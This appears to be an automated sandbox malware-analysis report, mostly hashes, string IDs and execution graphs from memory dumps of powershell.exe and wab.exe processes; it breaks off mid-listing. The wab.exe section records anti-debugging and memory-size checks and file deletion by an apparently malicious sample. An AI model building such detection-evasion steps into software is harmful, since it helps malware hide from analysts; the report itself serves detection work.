                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$tPtq$tPtq$$tq
                                                                              • API String ID: 0-2998347628
                                                                              • Opcode ID: 2de8c437fb6d4a0d2bde190a4fde2a096b6dd5e89282fdf807ec8c549d3e8250
                                                                              • Instruction ID: ab6dfaae2d6088cbf6dbc1c698889fa62e0a52f1c8f68f33730d2b54b427e76f
                                                                              • Opcode Fuzzy Hash: 2de8c437fb6d4a0d2bde190a4fde2a096b6dd5e89282fdf807ec8c549d3e8250
                                                                              • Instruction Fuzzy Hash: A96108B1705106DFEB349BA9C4506EAFBA2AF89311F14C099EA099F751CB31DD41CBB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B4D14 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$tPtq$$tq$$tq$$tq
                                                                              • API String ID: 0-2731490204
                                                                              • Opcode ID: 1c1da070d36cd9c074355ce76865fc62b9a54d40a8b106ed5653f5834b317fe7
                                                                              • Instruction ID: 4f08e59b5ab7318442fb3038eb59738cc18910ab326c32976b7b3b5cb61daabe
                                                                              • Opcode Fuzzy Hash: 1c1da070d36cd9c074355ce76865fc62b9a54d40a8b106ed5653f5834b317fe7
                                                                              • Instruction Fuzzy Hash: A24104F1A04286EBFB348F55C540BE5B7B1AB85320F5481AAEA1D9BE93C731D840CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BC4B4 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              • Opcode ID: c201bb4d589036bdf3ade62e833994236ffc3df6ae531a7129f33ae9fce1879e
                                                                              • Instruction ID: 1f56ff7395b476ce3a2b4f81dcad0a2d3c3f29786aa4ac73005769c6827b7761
                                                                              • Opcode Fuzzy Hash: c201bb4d589036bdf3ade62e833994236ffc3df6ae531a7129f33ae9fce1879e
                                                                              • Instruction Fuzzy Hash: 8F317BF270821A8FEF354A6B58802F6F795AF89110B24606BDA0ACB945DF31C851C371
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B6EF5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              • Opcode ID: 46bef03841617b9141b4828aebdb3e635249a9bf01b319f363adc37b254e5e5a
                                                                              • Instruction ID: e61ad8ea8b3fc09e4c0b07c2306ac7ff8fe4b102fe83f9769ca65434ed5b0d83
                                                                              • Opcode Fuzzy Hash: 46bef03841617b9141b4828aebdb3e635249a9bf01b319f363adc37b254e5e5a
                                                                              • Instruction Fuzzy Hash: 3E315CF2709206CFEF354A6598111F6F7A1EBC1261B24406FDA0D8BA46DF31D851C752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B00F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$tl$tl
                                                                              • API String ID: 0-517773585
                                                                              • Opcode ID: 87a9a0c0baa6746528d6b993f4161737ccee22fca6a99326d19e232bd0bb8599
                                                                              • Instruction ID: d61e4721065ffb7d966f48936dd0c635b4b138f33dc4dc45433526a28f0c46b0
                                                                              • Opcode Fuzzy Hash: 87a9a0c0baa6746528d6b993f4161737ccee22fca6a99326d19e232bd0bb8599
                                                                              • Instruction Fuzzy Hash: 47110BB930420A9BFB3C556E9800BA7F79AFBC1761F24C02AE64D87B51EA31C941C751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BBAF8 Relevance: 5.5, Strings: 4, Instructions: 481COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (otq$(otq$(otq$(otq
                                                                              • API String ID: 0-2682020920
                                                                              • Opcode ID: 5c27897011f948c06c5a5b02d3badb2e8bc2b37850b7d3087c536ae3a04825ca
                                                                              • Instruction ID: 3e71095801b846a4263d9c8f84b24f926c69be8a3e7cf5294c8181152b2053ed
                                                                              • Opcode Fuzzy Hash: 5c27897011f948c06c5a5b02d3badb2e8bc2b37850b7d3087c536ae3a04825ca
                                                                              • Instruction Fuzzy Hash: B8F116F1704249CFEB358F69C840BAAFBA6EF85310F14846AE6498F691DF35D841CB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BD6E8 Relevance: 5.4, Strings: 4, Instructions: 375COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq
                                                                              • API String ID: 0-3196592860
                                                                              • Opcode ID: ae12f65dedcbae8559f98683b260e9fa001afe00f257db60e821153d951add17
                                                                              • Instruction ID: 3cbd153a63a20a04bfebcf9966dc62918c656b343b357cd64beebc41d90dbee6
                                                                              • Opcode Fuzzy Hash: ae12f65dedcbae8559f98683b260e9fa001afe00f257db60e821153d951add17
                                                                              • Instruction Fuzzy Hash: 72D109B172824ADFEB359F69C4006EABBB2AF86311F24C06AD64DCFA51D731C941C791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B9BF8 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l
                                                                              • API String ID: 0-538009330
                                                                              • Opcode ID: 1c05f3f4388ec66f050fdc59832bb9960fb1e418e55324a3c03dcc3c5663c163
                                                                              • Instruction ID: c3fc9961cdb9b973832ae0b0eb10492a1fefe7a94eb7f16a50c251c5ecbc1eb2
                                                                              • Opcode Fuzzy Hash: 1c05f3f4388ec66f050fdc59832bb9960fb1e418e55324a3c03dcc3c5663c163
                                                                              • Instruction Fuzzy Hash: 24B171B1A01605DBEB34CF94C590BAAF7B2BF89721F14851EDB4A6BB44C731B841CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BA058 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l
                                                                              • API String ID: 0-538009330
                                                                              • Opcode ID: 82534a9efdcc035e7c7985181035a344839d1273034ac30bd78f73589045f5f1
                                                                              • Instruction ID: 9010c1a1577bb4d7565cfeda22064234455a59d2694f0d0ff419b1f4b49c6da2
                                                                              • Opcode Fuzzy Hash: 82534a9efdcc035e7c7985181035a344839d1273034ac30bd78f73589045f5f1
                                                                              • Instruction Fuzzy Hash: D77184B0E00509DFEB64CFA8C550AAABBB3AF88314F14C169D9096FB54DB32DD41CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B23C8 Relevance: 5.1, Strings: 4, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,S~l$,S~l$p5nk$xS~l
                                                                              • API String ID: 0-3704198172
                                                                              • Opcode ID: 2699a7276c7a703ba81c911d8c1f222ad774184d8121c5c24a0349e829ad43ab
                                                                              • Instruction ID: bf1c5366853aedca27d2d3571f6a0c334f0b61a81531e01c518957ccbd2282c8
                                                                              • Opcode Fuzzy Hash: 2699a7276c7a703ba81c911d8c1f222ad774184d8121c5c24a0349e829ad43ab
                                                                              • Instruction Fuzzy Hash: 154129F1B042199FD7319B7988017A7BBA5AF85310F1481BAE609DBF51DA35C881C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B57B0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$$tq
                                                                              • API String ID: 0-173548568
                                                                              • Opcode ID: 95b1662b36602d026e2873e663052da87db904886854c1ed47228de990468140
                                                                              • Instruction ID: 3fcf310420b847dbdc6dc10c7d00f8bfb8cd46f17be7317bed74e58b205e7f41
                                                                              • Opcode Fuzzy Hash: 95b1662b36602d026e2873e663052da87db904886854c1ed47228de990468140
                                                                              • Instruction Fuzzy Hash: 20317DB23143065BF634157A4811B7BB69F8BC4714F24442ADA0ADF791DE35CD518360
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B63E0 Relevance: 5.1, Strings: 4, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$tPtq$tPtq
                                                                              • API String ID: 0-1642240501
                                                                              • Opcode ID: a86fa19422072c8c6a8a5f965b2f8caa8099f3055d7a60c9a819aa349d6193c0
                                                                              • Instruction ID: 14963f4225c0ce40ea0e95f2e01bb2ca64ea0f143d1d5da8ee6c29eafa3fa5dc
                                                                              • Opcode Fuzzy Hash: a86fa19422072c8c6a8a5f965b2f8caa8099f3055d7a60c9a819aa349d6193c0
                                                                              • Instruction Fuzzy Hash: 5B314DF1B042659FC7215B689811ABAFFB2EF86310F14815ADA49AF792C730CD01C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B0CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$$tq
                                                                              • API String ID: 0-173548568
                                                                              • Opcode ID: 866f58d16e8678684e2af56725d30a4ae7b1026e75f02ee3963efac759ae9a19
                                                                              • Instruction ID: 8edec1c9043aa7b535079f299f1c3b83c9019d1f736c5dfd4f143c818e215168
                                                                              • Opcode Fuzzy Hash: 866f58d16e8678684e2af56725d30a4ae7b1026e75f02ee3963efac759ae9a19
                                                                              • Instruction Fuzzy Hash: B5216BF33142065BFB3C197E9800767B7AA9BC0311F64812E9A4DCB7C1DE75D8418361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BB485 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$84|l$W$tPtq
                                                                              • API String ID: 0-3442102116
                                                                              • Opcode ID: 7e0f3e257772bd46a13e6baf0d216f12598fa2db57a559b3e5eb4f5d9a373075
                                                                              • Instruction ID: fb2daada3e0e594f456a1dae0b19d1cee3183b810b17133400d8836f39482d11
                                                                              • Opcode Fuzzy Hash: 7e0f3e257772bd46a13e6baf0d216f12598fa2db57a559b3e5eb4f5d9a373075
                                                                              • Instruction Fuzzy Hash: D931D1F0A05246CFEB35CF548984BA6FBA1AB85314F18809BD6095FA52DB31DC40C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B17A0 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq
                                                                              • API String ID: 0-3085001694
                                                                              • Opcode ID: 32d72a35143987437f4880665a3bcf45699395ad54b40b30702950597e648509
                                                                              • Instruction ID: f8d5ec616a061ff44fc9cec986d4b749fd395900d72fb0c12a7e2e6f14af846e
                                                                              • Opcode Fuzzy Hash: 32d72a35143987437f4880665a3bcf45699395ad54b40b30702950597e648509
                                                                              • Instruction Fuzzy Hash: 1801D05170C35D4FD377027818316E6AF769FC761072901E7C546DF652C9544D5183E7
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:15.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:12
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 5112 2578440 5113 2578486 DeleteFileW 5112->5113 5115 25784bf 5113->5115 5116 257f480 5117 257f4b5 5116->5117 5118 257f48d 5116->5118 5121 257f558 5117->5121 5122 257f59e GlobalMemoryStatusEx 5121->5122 5123 257f4d2 5122->5123 5124 25770b8 5125 25770fc CheckRemoteDebuggerPresent 5124->5125 5126 257713e 5125->5126

                                                                              Executed Functions

                                                                              Function 025770B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 73 25770b8-257713c CheckRemoteDebuggerPresent 75 2577145-2577180 73->75 76 257713e-2577144 73->76 76->75
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID: |l
                                                                              • API String ID: 3662101638-2063047074
                                                                              • Opcode ID: df8acd8a8990f24d0c7fad7f163fc9689cc3a2bb5f53886076fb9bcb934779f4
                                                                              • Instruction ID: 0ea1c578fee65a2df075cc70f5ab9999507b7b42039ef75d1c7d26d14890d3f8
                                                                              • Opcode Fuzzy Hash: df8acd8a8990f24d0c7fad7f163fc9689cc3a2bb5f53886076fb9bcb934779f4
                                                                              • Instruction Fuzzy Hash: 032128B1D002598FDB10CF9AD844BEEFBF4EF49320F14845AE459A7250D778A944CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 025770B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 66 25770b0-257713c CheckRemoteDebuggerPresent 69 2577145-2577180 66->69 70 257713e-2577144 66->70 70->69
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID: |l
                                                                              • API String ID: 3662101638-2063047074
                                                                              • Opcode ID: 77420264bba4fa9bcf584cb563ce2c0cf8eb7026dd7b4a113e29fa059a06b244
                                                                              • Instruction ID: 17056c98749ba551a824c98615605a4a7027ec745b03bca4ecdd6c0595fe6376
                                                                              • Opcode Fuzzy Hash: 77420264bba4fa9bcf584cb563ce2c0cf8eb7026dd7b4a113e29fa059a06b244
                                                                              • Instruction Fuzzy Hash: 852128B1D002598FDB10CF9AD884BEEFBF4EF49320F24846AE459A7250D778A944CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02578440 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 79 2578440-257848a 81 2578492-25784bd DeleteFileW 79->81 82 257848c-257848f 79->82 83 25784c6-25784ee 81->83 84 25784bf-25784c5 81->84 82->81 84->83
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 025784B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID: |l
                                                                              • API String ID: 4033686569-2063047074
                                                                              • Opcode ID: 716bc4444e1adf947e723046c4709e5ee6c9a511fceadd53ae1cab0b0ee69fbf
                                                                              • Instruction ID: 7980d5dda391f135f6eaadbb5dcb5f1e0b33b77540c3a5eb9b5f0ed39f1ae943
                                                                              • Opcode Fuzzy Hash: 716bc4444e1adf947e723046c4709e5ee6c9a511fceadd53ae1cab0b0ee69fbf
                                                                              • Instruction Fuzzy Hash: 861136B1C006599BCB10CF9AD549B9EFBF4FF48324F15812AD818A7640D778A940CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0257F558 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 87 257f558-257f5cc GlobalMemoryStatusEx 89 257f5d5-257f5fd 87->89 90 257f5ce-257f5d4 87->90 90->89
                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0257F5BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID: |l
                                                                              • API String ID: 1890195054-2063047074
                                                                              • Opcode ID: 62d0c4e3be17fc27b1f1f38717887408f03a2358e8977d1c890a1bafd30fa26e
                                                                              • Instruction ID: 1ac760c3d9352e9d427319060b87fc75393a1bc49dd20509373b9d0c61a2f0b0
                                                                              • Opcode Fuzzy Hash: 62d0c4e3be17fc27b1f1f38717887408f03a2358e8977d1c890a1bafd30fa26e
                                                                              • Instruction Fuzzy Hash: 2E111FB1C0066A9BCB10CFAAC544BDEFBF4BF48320F14816AD818A7640D778A940CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0254D030 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939750670.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_254d000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bc68b2ff3c830eb6cce43ad6c90734af437a152f2d5180876abf4d3cc6f05d19
                                                                              • Instruction ID: 728475b200aa2a31051077a759e41c61f4ddb01d1ed986e44e5a5786bbed8b6e
                                                                              • Opcode Fuzzy Hash: bc68b2ff3c830eb6cce43ad6c90734af437a152f2d5180876abf4d3cc6f05d19
                                                                              • Instruction Fuzzy Hash: 8D2100B1605200DFDB10DF14D980B26FFB5FB88318F24C96DE90D4B246DB3AE806CA66
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0254D02B Relevance: .1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939750670.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_254d000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2c524f9a6492cb18d457a139d617f430aafae7ae12c6c3bba7f73639ee57585
                                                                              • Instruction ID: 4407e08449b3100556debb9a447165ec5e739fff51426ea1d695f29cf92d8273
                                                                              • Opcode Fuzzy Hash: d2c524f9a6492cb18d457a139d617f430aafae7ae12c6c3bba7f73639ee57585
                                                                              • Instruction Fuzzy Hash: B611BB75504280CFDB12CF14D5C0B25FFB1FB84318F28C6AAD8494B656C33AE44ACB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:27.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:28.1%
                                                                              Total number of Nodes:217
                                                                              Total number of Limit Nodes:4
                                                                              execution_graph 875 6237c2 876 6237d3 875->876 879 622f51 ResolveDelayLoadedAPI 876->879 878 6237e0 879->878 896 6231d3 897 6231e7 _exit 896->897 898 6231ee 896->898 897->898 899 623202 898->899 900 6231f7 _cexit 898->900 900->899 647 623030 664 623675 647->664 649 623035 650 623046 GetStartupInfoW 649->650 651 623063 650->651 652 623078 651->652 653 62307f Sleep 651->653 654 623097 _amsg_exit 652->654 656 6230a1 652->656 653->651 654->656 655 6230e3 _initterm 660 6230fe __IsNonwritableInCurrentImage 655->660 656->655 657 6230c4 656->657 656->660 658 6231a6 _ismbblead 658->660 659 6231ee 659->657 662 6231f7 _cexit 659->662 660->658 660->659 663 62318e exit 660->663 669 621c5c 660->669 662->657 663->660 665 62369a 664->665 666 62369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 664->666 665->666 668 623702 665->668 667 6236ed 666->667 667->668 668->649 733 6237f0 669->733 673 621d01 HeapSetInformation 674 621d20 673->674 706 621d18 673->706 737 6229ab CommandLineToArgvW 674->737 679 622560 683 62256b FreeLibrary 679->683 684 622578 679->684 680 62201a FreeLibrary 680->679 681 621da9 RegisterClassW CreateWindowExW 682 621e0e 681->682 681->706 751 621b83 memset 682->751 683->684 787 621ae4 684->787 689 621e22 GetLastError 689->706 690 621e2f 757 6225d3 memset memset CommandLineToArgvW 690->757 691 621ae4 2 API calls 693 62259a 691->693 791 6232b0 693->791 696 6225a9 696->660 698 621eee 699 621ef2 EventUnregister 698->699 701 621f1f memset LoadStringW MessageBoxW 699->701 702 621f6d 699->702 701->706 703 621f79 GetProcAddress 702->703 708 62202e 702->708 703->706 705 622036 GetProcAddress 705->706 710 62204e 705->710 706->679 706->680 708->705 709 62208a 708->709 709->706 711 62211c GetProcAddress 709->711 710->706 711->706 712 622136 711->712 713 62218c memset 712->713 715 622225 712->715 717 6221a9 LoadStringW 713->717 716 622384 715->716 797 621b21 715->797 718 62242a 716->718 719 62238d GetProcAddress 716->719 717->715 721 622433 GetProcAddress 718->721 722 6224d0 718->722 719->706 728 6223a5 719->728 721->706 729 62244b 721->729 723 6224d8 GetProcAddress 722->723 725 6224f0 722->725 723->706 723->725 724 622525 GetProcAddress 724->706 726 62253d 724->726 725->706 725->724 726->679 728->706 730 6223e2 memset LoadStringW 728->730 729->706 731 622488 memset LoadStringW 729->731 730->718 731->722 732 62233c memset LoadStringW 732->716 734 621c6b memset GetCommandLineW 733->734 735 621ab0 734->735 736 621acb 735->736 736->673 736->736 738 621d27 737->738 739 6229cc 737->739 743 621bf4 738->743 740 6229db LocalFree 739->740 740->738 741 6229ec 740->741 742 622a08 RegisterApplicationRestart 741->742 742->738 801 6228a4 memset 743->801 746 621c28 PathAppendW 747 621c4d 746->747 748 621c3e LoadLibraryW 746->748 749 6232b0 4 API calls 747->749 748->747 750 621c5a LoadStringW LoadIconW LoadCursorW 749->750 750->681 752 6228a4 10 API calls 751->752 754 621bbb LoadLibraryW 752->754 755 6232b0 4 API calls 754->755 756 621bf2 755->756 756->689 756->690 758 622888 757->758 759 622661 757->759 761 6232b0 4 API calls 758->761 760 62287d LocalFree 759->760 762 622683 StrCmpNIW 759->762 768 622676 759->768 760->758 763 621e43 761->763 764 6226f0 762->764 769 6226a0 762->769 763->706 782 62193a EventRegister 763->782 766 622709 PathFindExtensionW 764->766 767 622741 764->767 765 622761 StrCmpIW 765->767 773 622785 765->773 770 62271e StrCmpIW 766->770 767->765 767->768 768->760 769->768 813 621b57 769->813 770->767 771 622730 770->771 771->768 771->770 773->768 774 6227c0 773->774 775 6227d3 GetFileAttributesW 774->775 776 6227e5 775->776 780 622833 775->780 777 622811 776->777 778 6227ee PathRemoveFileSpecW 776->778 777->768 778->777 779 6227ff GetFileAttributesW 778->779 779->777 779->780 780->777 817 622b60 780->817 783 621998 EventSetInformation 782->783 784 62198b 782->784 783->784 785 6232b0 4 API calls 784->785 786 6219c5 785->786 786->698 786->699 796 6219c7 EventWriteTransfer 786->796 788 621af2 787->788 789 621b16 788->789 790 621b06 GetProcessHeap HeapFree 788->790 789->691 790->789 792 6232bb 791->792 793 6232b8 791->793 831 6232c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 792->831 793->696 795 6233f6 795->696 796->698 798 621b4d 797->798 799 621b2e 797->799 798->706 798->732 799->799 832 622c36 799->832 802 6228ee RegOpenKeyExW 801->802 803 62299d 801->803 805 622914 RegQueryValueExW 802->805 806 622989 802->806 804 6232b0 4 API calls 803->804 808 621c17 PathRemoveFileSpecW 804->808 805->806 809 622949 805->809 806->803 807 622991 RegCloseKey 806->807 807->803 808->746 808->747 810 622958 ExpandEnvironmentStringsW 809->810 811 62296d GetFileAttributesW 809->811 810->806 811->806 812 622979 811->812 812->806 814 621b63 813->814 814->814 815 622b60 6 API calls 814->815 816 621b7b 815->816 816->768 818 622bc7 817->818 819 622b74 817->819 818->777 819->818 823 622a7e 819->823 822 622baa memcpy 822->818 824 